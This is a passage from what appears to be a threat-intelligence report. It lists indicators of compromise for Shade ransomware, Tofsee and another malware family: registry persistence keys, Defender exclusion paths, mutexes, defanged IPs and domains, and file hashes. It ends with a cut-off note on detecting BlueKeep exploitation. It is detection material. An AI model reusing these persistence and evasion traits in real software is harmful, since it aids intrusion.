\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_64 \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_64 \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\COMSYSAPP \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\COMSYSAPP \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IDSVC \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IDSVC \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IEETWCOLLECTORSERVICE \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IEETWCOLLECTORSERVICE \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MOZILLAMAINTENANCE \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MOZILLAMAINTENANCE \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MSISERVER \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MSISERVER \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\OSE \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\OSE \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UI0DETECT \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UI0DETECT \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\VDS \nValue Name: Type ` | 18 \nMutexes | Occurrences \n---|--- \n`gazavat-svc` | 18 \n`kkq-vx_mtx52` | 18 \n`kkq-vx_mtx53` | 18 \n`kkq-vx_mtx54` | 18 \n`kkq-vx_mtx55` | 18 \n`kkq-vx_mtx56` | 18 \n`kkq-vx_mtx57` | 18 \n`kkq-vx_mtx58` | 18 \n`kkq-vx_mtx59` | 18 \n`kkq-vx_mtx60` | 18 \n`kkq-vx_mtx61` | 18 \n`kkq-vx_mtx62` | 18 \n`kkq-vx_mtx63` | 18 \n`kkq-vx_mtx64` | 18 \n`kkq-vx_mtx65` | 18 \n`kkq-vx_mtx66` | 18 \n`kkq-vx_mtx67` | 18 \n`kkq-vx_mtx68` | 18 \n`kkq-vx_mtx69` | 18 \n`kkq-vx_mtx70` | 18 \n`kkq-vx_mtx71` | 18 \n`kkq-vx_mtx72` | 18 \n`kkq-vx_mtx73` | 18 \n`kkq-vx_mtx74` | 18 \n`kkq-vx_mtx75` | 18 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\ckjgpiji.tmp` | 18 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\klncjook.tmp` | 18 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\bglnccaf.tmp` | 18 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\mnclgkoo.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\MSInfo\\kcndgmlj.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\OFFICE14\\cgcganec.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\VSTO\\10.0\\pnpndocj.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\bafefhom.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\dnmejccm.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\ejlkpjei.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\fijffced.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\ghpbhbif.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\gkbpadmi.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\pnhochhl.tmp` | 18 \n`%ProgramFiles%\\DVD Maker\\jaemdheq.tmp` | 18 \n`%ProgramFiles%\\Internet Explorer\\geakanpm.tmp` | 18 \n`%SystemRoot%\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorsvw.exe` | 18 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe` | 18 \n`%System32%\\alg.exe` | 18 \n`%System32%\\dllhost.exe` | 18 \n`%System32%\\ieetwcollector.exe` | 18 \n`%System32%\\msdtc.exe` | 18 \n`%System32%\\msiexec.exe` | 18 \n`%System32%\\snmptrap.exe` | 18 \n`%System32%\\sppsvc.exe` | 18 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 042fc31aadb0e0a33f91c9513ed9110d0c181de5b49f22614eb15ca759aabc58 07964288aebc5a85af04a534b2e795ded8c270466edfe2938cb5a7aae95fedee 2868317804d6a32158c492563f8cf121b0e714d116046f66323d49f7ea441f96 32084017ad00fe6e0ab45a804904363e3526f383cc78d35df55f66937b96f8fd 45414708db6a99c7fb927fcbc84861e55255a85e1583eaf661ef6226a880c525 53fd6b9b925d4cf2b143f057f11fa15659dd8d3e560aafa54148e87082e0aae7 69907401f98b32f51c11cd53b5149b29f8c4ecab38e08ca76188739f57e00431 6e3f1120e34aac4dea7bc87ce7a7185074841bc7077c2fa13a742f0ca53c81a3 6fa4177a1ee93669aa408db21de55d860d9792f6d544cf3510d4c121c95f5be0 749762f179e4c19d613a128150d3b82d1b0c138424ad3d436a77874a3392829e 79adb188cd80c713fabe4921a52f5e41a040e913e32b995d98ea90a94cbb5006 91a4c230b121564208cbb629ddb79df79651738b2abd59c426b32e4dc4022f1d a24c20594273edfc118ccce5b7e82081240e9f6a3323818f7ac17d990170471d a52fdbfecc6455806e30f138c43f02186f91daf5fb032e62efd68e697322542f b2aac39e286f2172baa62b16555191a60d6c1d25d63f73de51d80d60f263db32 c367dd19b06798008ed520730d0c7e05f28645d4565de62969a318275b9e6cff de601aa4336e1ae644b7dcee10e0748cea30d70907b7e899ae39b364b56e181f e62cf47c56c9858faf8a344e9b468293b48069c0f1d47034fea06409e9c26644 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-GbmULkOD5rE/XXwCwOHW-hI/AAAAAAAACn0/kgnSoWDxdZYvZlf6mnE8XK-lL3GtIGmYACLcBGAsYHQ/s1600/79adb188cd80c713fabe4921a52f5e41a040e913e32b995d98ea90a94cbb5006_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-xpszCiDFf_s/XXwC0ljKDTI/AAAAAAAACn4/oo7v-GB5mbEZaO2l5ie7Jfx89sL1w9_6wCLcBGAsYHQ/s1600/79adb188cd80c713fabe4921a52f5e41a040e913e32b995d98ea90a94cbb5006_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Shade-7158472-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xi ` | 71 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Client Server Runtime Subsystem ` | 71 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xVersion ` | 71 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32 ` | 71 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION ` | 71 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shst ` | 50 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: sh1 ` | 50 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xstate ` | 50 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xcnt ` | 50 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xmode ` | 50 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xpk ` | 50 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\DEBUG \nValue Name: ExceptionRecord ` | 41 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: CleanShutdown ` | 32 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Generation ` | 32 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\ENUM\\PCIIDE\\IDECHANNEL\\4&A27250A&0&2 \nValue Name: CustomPropertyHwIdKey ` | 32 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\ENUM\\USB\\VID_46F4&PID_0001\\1-0000:00:1D.7-2 \nValue Name: CustomPropertyHwIdKey ` | 32 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Data ` | 32 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Data ` | 31 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Generation ` | 31 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 31 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 31 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 31 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\ENUM\\PCI\\VEN_1AF4&DEV_1001&SUBSYS_00021AF4&REV_00\\3&2411E6FE&2&18 \nValue Name: CustomPropertyHwIdKey ` | 31 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shsnt ` | 31 \nMutexes | Occurrences \n---|--- \n`cversions.2.m` | 30 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`128[.]31[.]0[.]39` | 28 \n`193[.]23[.]244[.]244` | 26 \n`86[.]59[.]21[.]38` | 25 \n`131[.]188[.]40[.]189` | 24 \n`194[.]109[.]206[.]212` | 23 \n`154[.]35[.]32[.]5` | 22 \n`171[.]25[.]193[.]9` | 22 \n`76[.]73[.]17[.]194` | 20 \n`104[.]18[.]35[.]131` | 20 \n`208[.]83[.]223[.]34` | 18 \n`104[.]16[.]154[.]36` | 16 \n`104[.]16[.]155[.]36` | 15 \n`104[.]18[.]34[.]131` | 11 \n`51[.]68[.]204[.]139` | 3 \n`46[.]166[.]182[.]20` | 3 \n`148[.]251[.]51[.]66` | 3 \n`51[.]68[.]206[.]28` | 3 \n`145[.]239[.]66[.]236` | 2 \n`78[.]129[.]150[.]72` | 2 \n`144[.]76[.]57[.]165` | 2 \n`137[.]74[.]19[.]202` | 2 \n`37[.]157[.]254[.]113` | 2 \n`136[.]243[.]176[.]148` | 2 \n`69[.]30[.]219[.]82` | 2 \n`62[.]210[.]157[.]133` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`whatismyipaddress[.]com` | 31 \n`opengraphprotocol[.]org` | 31 \n`wsrs[.]net` | 31 \n`whatsmyip[.]net` | 31 \n`cmsgear[.]com` | 31 \n`luminati[.]io` | 31 \n`redirme[.]com` | 31 \nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\Windows\\csrss.exe` | 71 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM01859862[[fn=Urban Pop]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM01859865[[fn=Kilter]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM01859866[[fn=Macro]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM01859868[[fn=Thermal]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM01972873[[fn=Summer]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM02455519[[fn=Winter]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM02455596[[fn=Spring]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM02455610[[fn=Autumn]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01793058[[fn=Median]].dotx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01793060[[fn=Origin]].dotx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01793064[[fn=Equity]].dotx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\Normal.dotm` | 50 \n`%APPDATA%\\Microsoft\\UProof\\CUSTOM.DIC` | 50 \n`%APPDATA%\\Mozilla\\Firefox\\profiles.ini` | 50 \n`\\README1.txt` | 50 \n`\\README10.txt` | 50 \n`\\README2.txt` | 50 \n`\\README3.txt` | 50 \n`\\README4.txt` | 50 \n`\\README5.txt` | 50 \n`\\README6.txt` | 50 \n`\\README7.txt` | 50 \n`\\README8.txt` | 50 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 00591b03aa2be7dc7e67fa04a5da57bb803a2b4bc008fd7df40feadb72d2f00d 00953fe490792ae76ab5a584513a0ab3c460bcaa4fbb08f88ea5f0a261c44eab 018f3383e5f17da7f673fcd53b624f3157bfce958d3defd546fc82baf26265c6 01b2c4dd09be08a0db5cd266c2b0f4ae01ab920c6647910de820eb9cf82d55d4 01dea6848c96188f53d6e90977326b3562a2fcc30bd84c3d0e67880d6d4b8c50 02146af20bcaec9dbf6f30071791e73c7fd4eac6657f3b9d3159a6f663764250 025207f8e1551eb8156dd759426d57b2cbb42ce7b65479f071b7ffe8d0d03479 02b34490a5a4688b754dbb9be6507330ae88dfbc911f5c09e9e9e7c7ef10f2c5 02bf9968e18495581c271d4110a7bbaaf3889043c93af10357cb10499c8950a7 0616e6bc594dea95fad720bc966573921d9f2ec92eddcf665975227776e07fd6 0644b301b6414d2fe97644ae926849252c7a33607f2288253e9e53c5afd5c476 067cc19af3565e37da3bc0189210ad87ad111faf2a4c845f01fca036e3da912b 068491e6b7b02d7fef9a4778862886565795765b28b3c8f72f0d7adebc0b0a47 06a02b8b9e4871d0e558818a259dc6b6fcd0789b3d6a0f1c35dfaf90a8fc33f6 072a786d43860a9b5c2d4b49c1228ba651fad80e812eccd3e698d0f7b1b3adae 0769d0046146bd19aa118706ac9a470575139f06479c2781b680b5d8b92cce05 093bc279dcf1d7ee9a194af8e1e323b9ebe94f8a59a6dbbed8e82ca552c4dcb2 09483603bc66291e19444d644a5627416fb09d097b2a5efac0755c957cf7aedd 0c244b7cf8841885f0fecb184610c80ff3b3f6015e86f50ce35023383396dbf2 0c703b45991e6b99d4d4155af6437c5e255d7e52af06a2c9a29a3391774e4ae7 0d35cc4470e1f4493c8a9919769a9069a7deae2ee6ced8bd8ef0040c934a57f9 0d7531dc6587e8d9f9e3eae58e803b4aafd6d35927e7d48cc0a730cdc98a89d0 0df9f6f2d26051ba29c79a61f46e482d0cd61bb20a699cc7937e2f52f4d20fca 0e1f57431d814b1383b0202f10cdc0e929bd17d7788dc04e5d99b5f60761484e 0e21c68614126c9afae8a7747af154fdd254def83795bdb4033cb5a50de80026 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-NJODSS6tAm4/XXwDEdY-HuI/AAAAAAAACoE/DaPCb7CgxpAu4xFwsAKtY6jQhvRHnplfgCLcBGAsYHQ/s1600/018f3383e5f17da7f673fcd53b624f3157bfce958d3defd546fc82baf26265c6_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-b-XEJqyOt8s/XXwDbvGRqtI/AAAAAAAACoM/heOO8hopN5EWCvAOCdlUVdiQNu_S0UtywCLcBGAsYHQ/s1600/018f3383e5f17da7f673fcd53b624f3157bfce958d3defd546fc82baf26265c6_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Tofsee-7150793-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 18 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 18 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 18 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 12 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\cvjpowcr ` | 4 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\haoutbhw ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wpdjiqwl ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\mftzygmb ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\unbhgouj ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\exlrqyet ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lesyxfla ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\yrflksyn ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 18 \n`69[.]55[.]5[.]250` | 18 \n`172[.]217[.]3[.]100` | 18 \n`46[.]4[.]52[.]109` | 18 \n`176[.]111[.]49[.]43` | 18 \n`85[.]25[.]119[.]25` | 18 \n`144[.]76[.]199[.]2` | 18 \n`144[.]76[.]199[.]43` | 18 \n`43[.]231[.]4[.]7` | 18 \n`192[.]0[.]47[.]59` | 18 \n`95[.]181[.]178[.]17` | 18 \n`173[.]194[.]207[.]27` | 16 \n`216[.]146[.]35[.]35` | 15 \n`213[.]205[.]33[.]63` | 14 \n`172[.]217[.]197[.]26` | 14 \n`208[.]76[.]51[.]51` | 13 \n`208[.]76[.]50[.]50` | 13 \n`148[.]163[.]156[.]1` | 12 \n`64[.]233[.]186[.]26` | 12 \n`208[.]71[.]35[.]137` | 11 \n`172[.]217[.]5[.]228` | 11 \n`67[.]231[.]154[.]162` | 11 \n`209[.]85[.]203[.]27` | 11 \n`199[.]5[.]26[.]46` | 10 \n`199[.]5[.]157[.]131` | 10 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 18 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 18 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 18 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 18 \n`whois[.]iana[.]org` | 18 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 18 \n`whois[.]arin[.]net` | 18 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 18 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 18 \n`honeypus[.]rusladies[.]cn` | 18 \n`marina99[.]ruladies[.]cn` | 18 \n`sexual-pattern3[.]com` | 18 \n`coolsex-finders5[.]com` | 18 \n`smtp[.]secureserver[.]net` | 15 \n`super-efectindating3[.]com` | 13 \n`ipinfo[.]io` | 12 \n`mx1[.]emailsrvr[.]com` | 12 \n`mx0a-001b2d01[.]pphosted[.]com` | 12 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 11 \n`etb-1[.]mail[.]tiscali[.]it` | 10 \n`mta5[.]am0[.]yahoodns[.]net` | 9 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 9 \n`eur[.]olc[.]protection[.]outlook[.]com` | 9 \n`aol[.]com` | 9 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 9 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 18 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 18 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 18 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 11 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 3 \n`%TEMP%\\supvobl.exe` | 1 \n \n#### File Hashes\n\n` 1599aff065e6687acafc61a6f572652d1a0f7a0b17e3a71ca32fe848f2dc2732 1f8ca64991ba709a857f0dcd5bc5d6e9b0885ebc929989f03be3dfb58ecf9ce0 2360e7fb046aff05970dafbb74cdf5544e4699143605d8334772554f50ead3ac 4368a7bb048f1ba83bbd8430b2f49cb566cd69642ed3e9de3675f69533125b29 471c51b4340ed0091aeaf0402f762230689951e448f703033ed4bd1f2fb7a7d6 5195a9a5a3094c3735668216461d2be638152ae0738dab4d8a9295b697bc567c 675f23d881b4685a171767073e01f889ddeb879af7036fde7bcf341f33699da5 8092a1a1db9009435d1177afdef7fb7334e090b8d1b2f5c3e4d121ac0c110cbb 8120184d0a6340d01c5226d28747a2da5c81ef323e126df5a92ff9ada41b5c42 86cf3a207714ea953fb6834643b68064b912c077d44c31b9ed287feab0bc0e4a 8baff9107ff5c48ed53d633fe18f039d3cdd30eedcf05e55b4c467f9f9aed831 9c8275a2d03edd430e8263980a2c31106ab7116e40b93bead7108c6ed97e29fc a3e921ece8ec6a501dbb88c78fea54e2bd15e46b22cb61abced99973c70cf6f8 c2606f0413239f1c60cccd260374e6b88694718af0389be6d173a5c466e7d819 c2a86711660f12b21a7f3fe3fde6b7f07faeb486111d71e34abc27f90f31b415 c94a846dc45a26b4d3869ac32de34aa780720d4cd21743847bb87a2da4a14a8b d7d152e0dc028976050dbace9078c99feddce0f805c1892b4f1ac92feaf5fe15 dae992cf09f4681239e858e69eebfff7e35786069d7719482ccbb15615ec7a7e `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-FJUYMIJ3HFU/XXwD3MVq4qI/AAAAAAAACoU/SMSgo3n1ux812ReEz9X49AwSfQ5W3LFuQCLcBGAsYHQ/s1600/2360e7fb046aff05970dafbb74cdf5544e4699143605d8334772554f50ead3ac_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-_0rYDahd9jA/XXwD71mmg_I/AAAAAAAACoY/BTmfuISNl1Aa6qrMKI_f7hcxeoRgQZIFgCLcBGAsYHQ/s1600/2360e7fb046aff05970dafbb74cdf5544e4699143605d8334772554f50ead3ac_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-PkzlZMc8mf0/XXwEEEieQDI/AAAAAAAACoc/YaalBGtdJNMNPYMXCLiLPjMlM2JnUExZQCLcBGAsYHQ/s1600/cc4909f7a73da0a46bdf773459bf92459ec9295f5a1cc433107f94e0b60ba74b_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (7002) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this 